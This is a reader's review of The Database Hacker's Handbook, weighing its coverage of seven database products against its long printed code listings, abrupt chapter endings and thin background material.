The Database Hacker's Handbook (TDHH) is unique for two reasons. First, it is written by experts who spend their lives breaking database systems. Their depth of knowledge is unparalleled. Second, TDHH addresses security for Oracle, IBM DB2, IBM Informix, Sybase ASE, MySQL, Microsoft SQL Server, and PostgreSQL. No other database security book discusses as many products. For this reason, TDHH merits four stars. If a second edition of the book addresses some of my later suggestions, five stars should be easy to achieve.
The first issue I would like to see addressed in a second edition of TDHH is the removal of the 60 pages of C code scattered throughout the book. The code is already provided on the publisher's Web site, and its appearance in a 500 page book adds little. The three pages of characters (that's the best way to describe it) on pages 313-315 in Ch 19 are really beyond what any person should be expected to type.
The second issue involves general presentation. Many chapters end abruptly with no conclusion or summary. Several times I thought "Is that it?" Chapters 2, 5, 7, 10, 13, 15, 18, 21 and 22 all end suddenly. The editor should have told the authors to end those chapters with summaries, as appear in other chapters. On a related note, some of the "chapters" are exceptionally short; Ch 9 and 12 are each 3 pages, for example. Chapters that short are an indication the book is not organized well.
The final issue involves discussion of various databases. I preferred the "Hacking Exposed" style of the 2003 book SQL Server Security, which included Dave Litchfield and Bill Grindlay as co-authors. That book spent more time introducing the fundamentals of database functions before explaining how to break them. For example, more background on PL/SQL would be helpful. With 60 pages of code removed, that leaves plenty of room for such discussion in the second edition.
On the positive side, I thought TDHH started strong with Ch 1. The Oracle security advice was very strong. I thought the time delay tactic for extracting bit-by-bit information from the database was also exceptionally clever.
Although I have not read it, I believe Implementing Database Security and Auditing by Ron Ben Natan might be a good complement to TDHH. Natan's book appears to take a functional approach, whereas TDHH takes a product-specific approach. The drawback of the product-centric approach is repetition of general security advice, such as enabling encryption, disabling default accounts, etc.
At the end of the day TDHH is still a revealing and powerful book. Anyone responsible for database security should refer to the sections of the book covering their database. I also recommend keeping an eye on the Next Generation Security Software Web site for the latest on database security issues. You should also see the authors speak at security conferences whenever possible.